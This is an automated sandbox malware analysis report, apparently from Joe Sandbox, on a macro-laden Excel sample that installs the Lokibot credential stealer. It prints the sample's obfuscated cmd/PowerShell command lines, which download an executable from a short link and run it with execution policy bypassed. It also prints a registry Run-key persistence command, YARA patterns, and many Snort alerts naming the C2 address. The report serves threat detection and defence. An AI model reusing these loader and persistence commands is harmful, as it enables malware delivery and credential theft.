Loading ...

Play interactive tourEdit tour

Analysis Report 6Cprm97UTl

Overview

General Information

Sample Name:6Cprm97UTl (renamed file extension from none to xls)
Analysis ID:336301
MD5:29c8b5edc30eadf757b72b0a14857903
SHA1:77d432fb96a0a453bae30107990c2c9ee0314330
SHA256:a174abce368b775138c203d66fa8a3845aead2d53d87f220c58a2fe8ee7d9cf0

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Lokibot
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Drops PE files to the document folder of the user
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Found obfuscated Excel 4.0 Macro
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to launch a process as a different user
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Credential Stealer
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2260 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2292 cmdline: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1324 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • RegAsm.exe (PID: 2844 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
    • cmd.exe (PID: 2372 cmdline: cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2492 cmdline: powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2468 cmdline: cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2324 cmdline: powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • 12.exe (PID: 2800 cmdline: C:\Users\user\AppData\Local\Temp\12.exe MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
          • cmd.exe (PID: 2244 cmdline: 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
            • reg.exe (PID: 1664 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe' MD5: D69A9ABBB0D795F21995C2F48C1EB560)
          • ntrwe.exe (PID: 1916 cmdline: 'C:\Users\user\ntrwe.exe' MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
            • RegAsm.exe (PID: 2192 cmdline: C:\Users\user\AppData\Local\Temp\RegAsm.exe MD5: ADF76F395D5A0ECBBF005390B73C3FD2)
  • ntrwe.exe (PID: 2996 cmdline: 'C:\Users\user\ntrwe.exe' MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
  • ntrwe.exe (PID: 2292 cmdline: 'C:\Users\user\ntrwe.exe' MD5: 1D11ABB9DAC9B15823D1BCAD2B8B3675)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x13d0f:$des3: 68 03 66 00 00
        • 0x18100:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x181cc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 75 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          17.2.RegAsm.exe.400000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            17.2.RegAsm.exe.400000.1.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              17.2.RegAsm.exe.400000.1.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                17.2.RegAsm.exe.400000.1.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                17.2.RegAsm.exe.400000.1.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                • 0x12fff:$des3: 68 03 66 00 00
                • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                Click to see the 16 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe'), CommandLine: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe'), CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2260, ProcessCommandLine: cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe'), ProcessId: 2292

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\Documents\12.exeJoe Sandbox ML: detected
                Source: C:\Users\user\ntrwe.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,17_2_00403D74
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

                Software Vulnerabilities:

                barindex
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 4x nop then mov esp, ebp11_2_0031E458
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]11_2_0031F138
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h11_2_0031CE50
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 4x nop then jmp 00318CF3h11_2_00318240
                Source: C:\Users\user\ntrwe.exeCode function: 4x nop then jmp 00508CF3h15_2_00508520
                Source: C:\Users\user\ntrwe.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h15_2_0050CE50
                Source: C:\Users\user\ntrwe.exeCode function: 4x nop then mov esp, ebp18_2_0040E132
                Source: C:\Users\user\ntrwe.exeCode function: 4x nop then jmp 00408CF3h18_2_00408515
                Source: C:\Users\user\ntrwe.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h18_2_0040CE50
                Source: global trafficDNS query: name: cutt.ly
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.22.0.232:443

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.2.22:49167 -> 83.172.144.37:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49168 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49168 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49168 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49168 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.22:49169 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49169 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49169 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.22:49169 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49170 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49170 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49170 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49170 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49170
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49171 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49171 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49171 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49171 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49171
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49172 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49172 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49172 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49172 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49172
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49173 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49173 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49173 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49173 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49173
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49174 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49174 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49174 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49174 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49174
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49175 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49175 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49175 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49175 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49175
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49176 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49176 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49176 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49176 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49176
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49177 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49177 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49177 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49177 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49177
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49178 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49178 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49178 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49178 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49178
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49179 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49179 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49179 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49179 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49179
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49180 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49180 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49180 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49180 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49180
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49181 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49181 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49181 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49181 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49181
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49182 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49182 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49182 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49182 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49182
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49183 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49183 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49183 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49183 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49183
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49184 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49184 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49184 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49184 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49184
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49185 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49185 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49185 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49185 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49185
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49186 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49186 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49186 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49186 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49186
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49187 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49187 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49187 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49187 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49187
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49188 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49188 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49188 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49188 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49188
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49189 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49189 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49189 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49189 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49189
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49190 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49190 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49190 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49190 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49190
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49191 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49191 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49191 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49191 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49191
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49192 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49192 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49192 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49192 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49192
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49193 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49193 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49193 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49193 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49193
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49194 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49194 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49194 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49194 -> 185.206.215.56:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49194
